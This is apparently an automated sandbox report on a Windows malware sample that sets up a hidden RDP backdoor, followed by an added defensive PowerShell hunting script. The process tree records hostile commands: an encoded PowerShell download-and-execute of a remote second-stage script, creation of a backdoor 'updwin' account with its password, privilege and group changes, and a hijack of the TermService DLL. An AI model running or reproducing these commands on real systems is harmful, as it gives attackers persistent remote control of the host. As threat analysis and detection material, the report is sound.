Analysis
- max time kernel: 144s
- max time network: 147s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 17-11-2020 12:38
- Static task: static1
- Behavioral task: behavioral1 (sample 09fd827d8b404557a5c9e06810247c12.exe, resource win7v20201028)
- Behavioral task: behavioral2 (sample 09fd827d8b404557a5c9e06810247c12.exe, resource win10v20201028)
General
- Target: 09fd827d8b404557a5c9e06810247c12.exe
- Size: 3.4MB
- MD5: afb57d5d065aaa204e8a5c6803bab72b
- SHA1: 5cd785582bba69f740a8943c02123e683a541b3b
- SHA256: 3126cbdac814b04d544ff02e968d2143b231bb6d981ff8bf1812f6314cca187e
- SHA512: 40bfdc844abc2f49e810ac63e6e6b739aa656830d3833292dd1b43456a8452aa7181d675e28e4f4bf0f920009e35b0d631ec39a25968f12b7335528c41181f98
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 10 IoCs
Processes:
- powershell.exe (pid 792): network flows 7, 9, 11, 12, 14, 16, 18, 20, 22, 24
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
- 1188 icacls.exe
- 1720 icacls.exe
- 1740 icacls.exe
- 1300 takeown.exe
- 1204 icacls.exe
- 1580 icacls.exe
- 272 icacls.exe
- 1152 icacls.exe
Sets DLL path for service in the registry 2 TTPs
-
Processes:
- resource \Windows\Branding\mediasrv.png matched yara rule upx
- resource \Windows\Branding\mediasvc.png matched yara rule upx
Deletes itself 1 IoCs
Processes:
- 1700 powershell.exe
Loads dropped DLL 2 IoCs
Processes:
- 1452 (pid 1452; no image name recorded)
Modifies file permissions 1 TTPs 8 IoCs
Processes:
- 1300 takeown.exe
- 1204 icacls.exe
- 1580 icacls.exe
- 272 icacls.exe
- 1152 icacls.exe
- 1188 icacls.exe
- 1720 icacls.exe
- 1740 icacls.exe
Drops file in System32 directory 1 IoCs
Processes:
- File created C:\Windows\system32\rfxvmt.dll (powershell.exe)
Modifies service 2 TTPs 2 IoCs
Processes:
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters (reg.exe)
- Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" (reg.exe)
Drops file in Windows directory 41 IoCs
Processes:
All entries by powershell.exe.
Files under C:\Windows\branding:
- File created C:\Windows\branding\mediasrv.png
- File opened for modification C:\Windows\branding\mediasrv.png
- File created C:\Windows\branding\mediasvc.png
- File opened for modification C:\Windows\branding\mediasvc.png
- File created C:\Windows\branding\wupsvc.jpg
- File opened for modification C:\Windows\branding\wupsvc.jpg
- File opened for modification C:\Windows\branding\Basebrd
- File opened for modification C:\Windows\branding\ShellBrd
PowerShell command-analysis cache, all opened for modification under C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\:
- PowerShell_AnalysisCacheIndex
- PowerShell_AnalysisCacheEntry_49c17411-7f1b-4384-8238-b80005e0f10b
- PowerShell_AnalysisCacheEntry_901d3f56-9ba1-45b1-ae14-37782402b8cf
- PowerShell_AnalysisCacheEntry_1f2a41d6-691a-4033-ac73-9a2994f2aa56
- PowerShell_AnalysisCacheEntry_2661a184-3234-4dda-b4fd-49416db8d283
- PowerShell_AnalysisCacheEntry_3050180b-c7a5-431a-a7ed-0b642343bd33
- PowerShell_AnalysisCacheEntry_7114c748-7c42-4337-b7c8-6b60560282b9
- PowerShell_AnalysisCacheEntry_8fb28e17-f52f-4e85-b553-24c58867cceb
- PowerShell_AnalysisCacheEntry_c1d11fd5-8778-4be2-bd88-1e8754528638
- PowerShell_AnalysisCacheEntry_fc8f5aa1-773d-4914-b9e5-8949fe348541
- PowerShell_AnalysisCacheEntry_4897d70b-6551-49fb-98be-261295677ba5
- PowerShell_AnalysisCacheEntry_9f49f865-a3c6-4cf0-a3a3-fd1baa40b105
Temporary files, all opened for modification under C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\:
- CabEC04.tmp, TarECE3.tmp, TarEECF.tmp, TarEC05.tmp, TarECB2.tmp, CabEE7A.tmp, TarEEBD.tmp, TarEF00.tmp, CabEE8B.tmp, CabEECE.tmp, CabECB1.tmp, CabEEFF.tmp, TarEE8C.tmp, TarEE7B.tmp, CabECE2.tmp, CabEEBC.tmp
Other NetworkService profile files:
- File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
- File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
- File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files
- File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
- File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IKEQ71LS3BFIOP4E5W09.temp
Modifies data under HKEY_USERS 60 IoCs
Processes:
Processes: powershell.exe, WMIC.exe, WMIC.exe. All keys are under \REGISTRY\USER\S-1-5-20 (the NETWORK SERVICE profile); the prefix is omitted below.
Values set by powershell.exe:
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
- Set value (data) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- Set value (data) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- Set value (data) Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0a1e608fdbcd601
Keys created by powershell.exe under Software\Microsoft\SystemCertificates\:
- SmartCardRoot, SmartCardRoot\Certificates, SmartCardRoot\CRLs, SmartCardRoot\CTLs, trust, trust\Certificates, trust\CRLs, trust\CTLs, CA, CA\Certificates, CA\CRLs, CA\CTLs, Root, Root\Certificates, Root\CRLs, Root\CTLs, TrustedPeople, TrustedPeople\Certificates, TrustedPeople\CRLs, TrustedPeople\CTLs, Disallowed, Disallowed\Certificates, Disallowed\CRLs, Disallowed\CTLs, My
Keys created by powershell.exe under Software\Policies\Microsoft\SystemCertificates\:
- CA, CA\Certificates, CA\CRLs, CA\CTLs, trust, trust\Certificates, trust\CRLs, trust\CTLs, TrustedPeople, TrustedPeople\Certificates, TrustedPeople\CRLs, TrustedPeople\CTLs, Disallowed, Disallowed\Certificates, Disallowed\CRLs, Disallowed\CTLs
Other keys created:
- Software\Microsoft\Windows\CurrentVersion\Internet Settings (powershell.exe, x2)
- Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe x2, powershell.exe x1)
- Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad (powershell.exe)
- Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections (powershell.exe)
- Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage (powershell.exe)
- Software\Classes\Local Settings\MuiCache (powershell.exe)
- Software\Classes\Local Settings\MuiCache\25\52C64B7E (powershell.exe)
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
- HTTP User-Agent header, flow 11: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header, flow 12: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header, flow 14: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header, flow 16: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
- 1700 powershell.exe (x5)
- 792 powershell.exe (x2)
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
- pid 464
- pid 1452 (x4)
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
- Token: SeDebugPrivilege, 1700 powershell.exe
- Token: SeRestorePrivilege, 1580 icacls.exe
- Token: SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeAuditPrivilege (each x2), 1184 WMIC.exe
- Token: SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeAuditPrivilege (each x2), 1188 WMIC.exe
- Token: SeDebugPrivilege, 792 powershell.exe
Suspicious use of WriteProcessMemory 127 IoCs
Processes:
Source pid/process -> target pid/process (xN = number of times the report records the event):
- 1960 09fd827d8b404557a5c9e06810247c12.exe -> 1700 powershell.exe (x4)
- 1700 powershell.exe -> 1660 csc.exe (x3)
- 1660 csc.exe -> 1844 cvtres.exe (x3)
- 1700 powershell.exe -> 1300 takeown.exe (x3)
- 1700 powershell.exe -> 1204 icacls.exe (x3)
- 1700 powershell.exe -> 1580 icacls.exe (x3)
- 1700 powershell.exe -> 272 icacls.exe (x3)
- 1700 powershell.exe -> 1152 icacls.exe (x3)
- 1700 powershell.exe -> 1188 icacls.exe (x3)
- 1700 powershell.exe -> 1720 icacls.exe (x3)
- 1700 powershell.exe -> 1740 icacls.exe (x3)
- 1700 powershell.exe -> 1596 reg.exe (x3)
- 1700 powershell.exe -> 340 reg.exe (x3)
- 1700 powershell.exe -> 1644 reg.exe (x3)
- 1700 powershell.exe -> 1520 net.exe (x3)
- 1520 net.exe -> 1088 net1.exe (x3)
- 1700 powershell.exe -> 1684 cmd.exe (x3)
- 1684 cmd.exe -> 1672 cmd.exe (x3)
- 1672 cmd.exe -> 1636 net.exe (x3)
- 1636 net.exe -> 572 net1.exe (x3)
- 1700 powershell.exe -> 528 cmd.exe (x3)
Processes (tree depth in brackets; the recorded command line follows on the cmd: line)
[1] C:\Users\Admin\AppData\Local\Temp\09fd827d8b404557a5c9e06810247c12.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\09fd827d8b404557a5c9e06810247c12.exe"
    - Suspicious use of WriteProcessMemory
  [2] \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
      cmd: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      - Deletes itself
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        cmd: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yhohqbpl\yhohqbpl.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES63B2.tmp" "c:\Users\Admin\AppData\Local\Temp\yhohqbpl\CSC29A543AFC00E4EA59E5227AB87A5CD7.TMP"
    [3] C:\Windows\system32\takeown.exe
        cmd: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe
        cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\reg.exe
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    [3] C:\Windows\system32\reg.exe
        cmd: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies service
        - Modifies registry key
    [3] C:\Windows\system32\reg.exe
        cmd: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] C:\Windows\system32\net.exe
        cmd: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe
          cmd: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] C:\Windows\system32\cmd.exe
        cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd: cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            cmd: net start rdpdr
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              cmd: C:\Windows\system32\net1 start rdpdr
    [3] C:\Windows\system32\cmd.exe
        cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      [4] C:\Windows\system32\cmd.exe
          cmd: cmd /c net start TermService
        [5] C:\Windows\system32\net.exe
            cmd: net start TermService
          [6] C:\Windows\system32\net1.exe
              cmd: C:\Windows\system32\net1 start TermService
    [3] C:\Windows\system32\cmd.exe
        cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] C:\Windows\system32\cmd.exe
        cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
[1] C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe user updwin Ghasar4f5 /del
  [2] C:\Windows\system32\net.exe
      cmd: net.exe user updwin Ghasar4f5 /del
    [3] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 user updwin Ghasar4f5 /del
[1] C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe user updwin aq7RmA6J /add
  [2] C:\Windows\system32\net.exe
      cmd: net.exe user updwin aq7RmA6J /add
    [3] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 user updwin aq7RmA6J /add
[1] C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
  [2] C:\Windows\system32\net.exe
      cmd: net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
    [3] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
[1] C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
  [2] C:\Windows\system32\net.exe
      cmd: net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
    [3] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
[1] C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
  [2] C:\Windows\system32\net.exe
      cmd: net.exe LOCALGROUP "Administrators" updwin /ADD
    [3] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
[1] C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe user updwin aq7RmA6J
  [2] C:\Windows\system32\net.exe
      cmd: net.exe user updwin aq7RmA6J
    [3] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 user updwin aq7RmA6J
[1] C:\Windows\System32\cmd.exe
    cmd: cmd.exe /C wmic path win32_VideoController get name
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmd: wmic path win32_VideoController get name
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\cmd.exe
    cmd: cmd.exe /C wmic CPU get NAME
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmd: wmic CPU get NAME
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\cmd.exe
    cmd: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  [2] C:\Windows\system32\cmd.exe
      cmd: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmd: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        - Blacklisted process makes network request
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
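Read together, the process tree is a repeatable RDP-backdoor recipe: rfxvmt.dll is dropped into System32 and given a TrustedInstaller-owned, read-only ACL so it looks like a shipped component; TermService is repointed at the UPX-packed DLL stored as C:\Windows\branding\mediasrv.png; the RDP listener is moved to port 0x1C21 (7201); NETWORK SERVICE is added to Administrators; a local account updwin is created and added to Remote Desktop Users and Administrators; and a second stage is fetched with an encoded IEX download. The script below is an added hunting example for a Windows host, not part of the sandbox report or of the sample. The registry paths, file names, account names and file hashes are taken from the report above; the function names, the $KnownBadSha256 table and the rule that any ServiceDll other than termsrv.dll is worth flagging are assumptions of this example.

```powershell
# Added hunting script for the artefacts recorded in this report (not part of the
# sandbox output or of the sample). Paths, names and hashes come from the report;
# the function names and the $KnownBadSha256 table are this script's own.
# Run from an elevated PowerShell prompt. Written against PowerShell 2.0 (Windows 7),
# so it avoids Get-LocalGroupMember and Get-FileHash, which newer versions add.

# SHA256 values of the dropped files from the report's Downloads section.
$KnownBadSha256 = @{
    'rfxvmt.dll'   = '6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9'
    'mediasrv.png' = 'c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272'
    'mediasvc.png' = 'a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a'
}

function Get-Sha256Hex([string]$Path) {
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $fs  = [System.IO.File]::OpenRead($Path)
    try     { ($sha.ComputeHash($fs) | ForEach-Object { $_.ToString('x2') }) -join '' }
    finally { $fs.Close() }
}

function New-Finding([string]$Check, $Value, [bool]$Suspicious) {
    New-Object PSObject -Property @{ Check = $Check; Value = $Value; Suspicious = $Suspicious }
}

# 1. TermService must be served by termsrv.dll. The sample points ServiceDll at a
#    UPX-packed DLL renamed C:\Windows\branding\mediasrv.png.
function Test-TermServiceDll {
    $p   = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\TermService\Parameters' -ErrorAction Stop
    $dll = [Environment]::ExpandEnvironmentVariables([string]$p.ServiceDll)
    $expected = Join-Path $env:windir 'System32\termsrv.dll'
    New-Finding 'TermService ServiceDll' $dll (-not ($dll -ieq $expected))
}

# 2. RDP listener settings: PortNumber 0x1C21 (7201) instead of 3389, and the
#    fEnableWddmDriver policy forced to 0.
function Test-RdpSettings {
    $rdp = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -ErrorAction Stop
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services' -ErrorAction SilentlyContinue
    $wddmOff = ($pol -ne $null -and $pol.fEnableWddmDriver -eq 0)
    New-Finding 'RDP PortNumber' $rdp.PortNumber ($rdp.PortNumber -ne 3389)
    New-Finding 'fEnableWddmDriver = 0' $wddmOff $wddmOff
}

# 3. Local group membership via ADSI, which works on every Windows version.
function Get-LocalGroupMemberName([string]$Group) {
    $g = [ADSI]"WinNT://$env:COMPUTERNAME/$Group,group"
    @($g.psbase.Invoke('Members')) | ForEach-Object {
        $_.GetType().InvokeMember('Name', 'GetProperty', $null, $_, $null)
    }
}
function Test-RdpGroups {
    $admins = @(Get-LocalGroupMemberName 'Administrators')
    $rdu    = @(Get-LocalGroupMemberName 'Remote Desktop Users')
    $bad = @()
    # NETWORK SERVICE in Administrators and the 'updwin' account are direct IoCs from the
    # report; a computer account (name ending in $) in Remote Desktop Users is also abnormal.
    if ($admins -contains 'NETWORK SERVICE') { $bad += 'Administrators: NETWORK SERVICE' }
    foreach ($m in ($admins + $rdu)) {
        if ($m -ieq 'updwin' -or $m -like '*$') { $bad += "member: $m" }
    }
    New-Finding 'Administrators / Remote Desktop Users' ($bad -join '; ') ($bad.Count -gt 0)
}

# 4. PE images hiding behind image extensions under C:\Windows\Branding, plus hash
#    matches for the dropped files. rfxvmt.dll is checked by hash only, because a
#    file of that name can be legitimate on newer Windows versions.
function Test-DroppedFiles {
    $hits  = @()
    $paths = @(Join-Path $env:windir 'System32\rfxvmt.dll')
    $paths += @(Get-ChildItem (Join-Path $env:windir 'Branding') -Recurse -ErrorAction SilentlyContinue |
                Where-Object { -not $_.PSIsContainer } | ForEach-Object { $_.FullName })
    foreach ($f in $paths) {
        if (-not (Test-Path $f)) { continue }
        $fs = [System.IO.File]::OpenRead($f)
        try { $hdr = New-Object byte[] 2; [void]$fs.Read($hdr, 0, 2) } finally { $fs.Close() }
        $isPe     = ($hdr[0] -eq 0x4D -and $hdr[1] -eq 0x5A)      # 'MZ' DOS header
        $name     = [System.IO.Path]::GetFileName($f).ToLower()
        $hashHit  = $KnownBadSha256.ContainsKey($name) -and ((Get-Sha256Hex $f) -eq $KnownBadSha256[$name])
        $notPeExt = ($name -notlike '*.dll' -and $name -notlike '*.exe')
        if ($hashHit -or ($isPe -and $notPeExt)) { $hits += $f }
    }
    New-Finding 'Dropped files' ($hits -join '; ') ($hits.Count -gt 0)
}

# 5. Decode a 'powershell -enc' argument: base64 over UTF-16LE, as used by the last
#    process tree entry above.
function ConvertFrom-EncodedCommand([string]$Base64) {
    [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

$results = & { Test-TermServiceDll; Test-RdpSettings; Test-RdpGroups; Test-DroppedFiles }
$results | Format-Table Check, Suspicious, Value -AutoSize -Wrap
```

ConvertFrom-EncodedCommand applied to the -enc argument recorded in the last process tree entry yields an IEX of (New-Object Net.Webclient).downloadstring against the URL listed under Malware Config, which is how the speed.ps1 second stage is pulled. A clean host reports ServiceDll as C:\Windows\System32\termsrv.dll, PortNumber 3389, no NETWORK SERVICE in Administrators, and no MZ-headed .png or .jpg files under C:\Windows\Branding.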
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\RES63B2.tmp
  MD5: b94dbc7fc42030c383cd5e85235df22c
  SHA1: edfeb52fc61d5c89c7823ab13197d54f6540af5b
  SHA256: b608e81dd78246c1a0e6c75a4c2fe012463c24e475c36c112ec585d45f782e9e
  SHA512: 27715771c4dc60715b96f67be28d269fa3242a84501c5c2fec0ca034181a86f08ca1235f3a3b3ea5a9a22b565b59e949c3be5810a8347965f9f9f9015491d255
- C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  MD5: dac6b25db50155c0c78d5bf64fb95fa3
  SHA1: 9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
  SHA256: 6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
  SHA512: 679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
- C:\Users\Admin\AppData\Local\Temp\get-points.zip
  MD5: 7cac19b2868c41555db4b71219217f9b
  SHA1: d6f77db578db3c5c572c3a944d9072ed00560dcb
  SHA256: d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
  SHA512: 5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
- C:\Users\Admin\AppData\Local\Temp\yhohqbpl\yhohqbpl.dll
  MD5: 7e3b26b4e548b718ac01a4a813b7bbec
  SHA1: 4baa37135516e271433ebf733f1bb88653ae8677
  SHA256: 667b9ac53a020cdfa105ef9a8f816221696a98d3a353c276ba02d35942e7829d
  SHA512: e56602f602bee78cfb3675755dc4db3f191b7944ad467d358f8c942762c8f0a05f5287795c30271fb78977bb117db7a59468f323d9ed9741c01d55c1dfa74200
- C:\Windows\system32\rfxvmt.dll
  MD5: dc39d23e4c0e681fad7a3e1342a2843c
  SHA1: 58fd7d50c2dca464a128f5e0435d6f0515e62073
  SHA256: 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
  SHA512: 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
- \??\c:\Users\Admin\AppData\Local\Temp\yhohqbpl\CSC29A543AFC00E4EA59E5227AB87A5CD7.TMP
  MD5: 870893bd2875d881b5c35c83d5c54938
  SHA1: 7423aa725edbe59686aebcc032f4f0e797b2b2c4
  SHA256: 60902d9a170fb53d2c0113a4b4d9784542ece5e90c1f6c11aa30734c7a5e0749
  SHA512: c0a6e2d8232b5a567dbc9ce152943656484867357836ae199e4a9ff74b8b5c3430389c9c15c29c1f6944bda738dfb182320d46c051b244ab79c67d126abced39
- \??\c:\Users\Admin\AppData\Local\Temp\yhohqbpl\yhohqbpl.0.cs
  MD5: 6f235215132cdebacd0f793fe970d0e3
  SHA1: 2841e44c387ed3b6f293611992f1508fe9b55b89
  SHA256: ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
  SHA512: a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
- \??\c:\Users\Admin\AppData\Local\Temp\yhohqbpl\yhohqbpl.cmdline
  MD5: ec18c212f2cc954258b70bc21d1678eb
  SHA1: 232c273f68e5a8cc019b48a89b9e9281b18ad4a7
  SHA256: 682232b6bcc5beeea301620c7e76708a25b02eed5b82e3cbba9c038e2b90a34e
